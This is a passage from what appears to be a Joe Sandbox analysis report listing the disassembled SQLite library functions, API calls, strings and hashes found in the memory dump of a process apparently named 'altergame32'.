                                                                  • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                  • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                  • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                  • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                  • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                  • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                    • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                  • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                  • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                    • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                  • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                  • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                  • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                  • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                  • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                  • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                    • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                    • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                    • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                  • String ID:
                                                                  • API String ID: 961572588-0
                                                                  • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                  • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                  • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                  • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                  • String ID: 2$foreign key$indexed
                                                                  • API String ID: 4126863092-702264400
                                                                  • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                  • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                  • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                  • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: sqlite3_stricmp
                                                                  • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                  • API String ID: 912767213-1308749736
                                                                  • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                  • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                  • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                  • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                  APIs
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                  • sqlite3_step.SQLITE3 ref: 6094B496
                                                                  • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                  • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                  • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                    • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                  Similarity
                                                                  • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                  • String ID:
                                                                  • API String ID: 4082478743-0
                                                                  • Opcode ID: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                  • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                  • Opcode Fuzzy Hash: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                  • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                  APIs
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                    • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                    • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                    • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                  • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                  • String ID: BINARY$INTEGER
                                                                  • API String ID: 317512412-1676293250
                                                                  • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                  • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                  • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                  • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                  APIs
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                    • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                    • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                    • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                  Similarity
                                                                  • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                  • String ID:
                                                                  • API String ID: 4038589952-0
                                                                  • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                  • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                  • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                  • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                  APIs
                                                                    • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                    • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                    • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                  • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                    • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                  • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                  • sqlite3_step.SQLITE3 ref: 6096A435
                                                                  • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                  Similarity
                                                                  • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                  • String ID:
                                                                  • API String ID: 247099642-0
                                                                  • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                  • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                  • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                  • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                  APIs
                                                                    • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                    • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                    • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                    • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                  • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                  • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                    • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                  • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                  Similarity
                                                                  • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                  • String ID:
                                                                  • API String ID: 326482775-0
                                                                  • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                  • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                  • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                  • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                  APIs
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                  Similarity
                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                  • String ID:
                                                                  • API String ID: 1477753154-0
                                                                  • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                  • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                  • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                  • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                  APIs
                                                                    • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                  Similarity
                                                                  • API ID: sqlite3_logsqlite3_mutex_leave
                                                                  • String ID:
                                                                  • API String ID: 1465156292-0
                                                                  • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                  • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                  • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                  • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                  APIs
                                                                  • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                    • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                  • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                  • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                  • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                  • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                  • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                  • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                  • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                  • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                  APIs
                                                                  Strings
                                                                  • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                  • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                  • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                  • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                  • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                  • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                  • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                  • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                  • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                  • BEGIN;, xrefs: 609485DB
                                                                  • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                  Similarity
                                                                  • API ID: sqlite3_log
                                                                  APIs
                                                                    • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                    • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                    • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                    • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                    • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                    • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                    • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                  • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                  • sqlite3_free.SQLITE3 ref: 609605EA
                                                                  • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                  • sqlite3_free.SQLITE3 ref: 60960618
                                                                  • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                  • String ID: offsets
                                                                  APIs
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                  • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                  Similarity
                                                                  • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                  • String ID:
                                                                  APIs
                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                  • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                  • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                  • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                  Similarity
                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                  • String ID:
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                  APIs
                                                                  • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                  • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                  • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                  • sqlite3_free.SQLITE3 ref: 6095F180
                                                                    • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                    • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                  • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                    • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                  • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                  • String ID: |
                                                                  APIs
                                                                  • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                    • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                  • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                  • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                  • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                  APIs
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                  • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                  • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                  • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                  • String ID:
                                                                  APIs
                                                                    • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                    • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                    • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                  • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                    • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                  • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                    • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                    • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                    • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                  • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                  • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                  • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                  • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                  • String ID: optimize
                                                                  APIs
                                                                  • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                  • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                  • sqlite3_reset.SQLITE3 ref: 60965556
                                                                  • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                    • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                    • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                  • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                  • sqlite3_free.SQLITE3 ref: 60965714
                                                                  • sqlite3_free.SQLITE3 ref: 6096574B
                                                                    • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                  • sqlite3_free.SQLITE3 ref: 609657AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                  • String ID:
                                                                  APIs
                                                                  • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                    • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                  • sqlite3_free.SQLITE3 ref: 609647C5
                                                                    • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                  • sqlite3_free.SQLITE3 ref: 6096476B
                                                                    • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                  • sqlite3_free.SQLITE3 ref: 6096477B
                                                                  • sqlite3_free.SQLITE3 ref: 60964783
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                  • String ID:
                                                                  APIs
                                                                  • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                    • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                  • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                  • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                  • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                  • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                  • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                  • sqlite3_free.SQLITE3 ref: 60963621
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                  • String ID:
                                                                  APIs
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                  Strings
                                                                  • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                  • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                  • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                  APIs
                                                                    • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                  • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                  • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                  • String ID: library routine called out of sequence$out of memory
                                                                  APIs
                                                                  • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                    • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                  • sqlite3_log.SQLITE3 ref: 609498F5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                  • String ID: List of tree roots: $d$|
                                                                  • API String ID: 3709608969-1164703836
                                                                  APIs
                                                                    • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                    • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                    • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                    • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                  • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                  • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                  • sqlite3_free.SQLITE3 ref: 6096029A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                  • String ID: e
                                                                  • API String ID: 786425071-4024072794
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  Similarity
                                                                  • API ID: sqlite3_exec
                                                                  • String ID: sqlite_master$sqlite_temp_master$|
                                                                  • API String ID: 2141490097-2247242311
                                                                  APIs
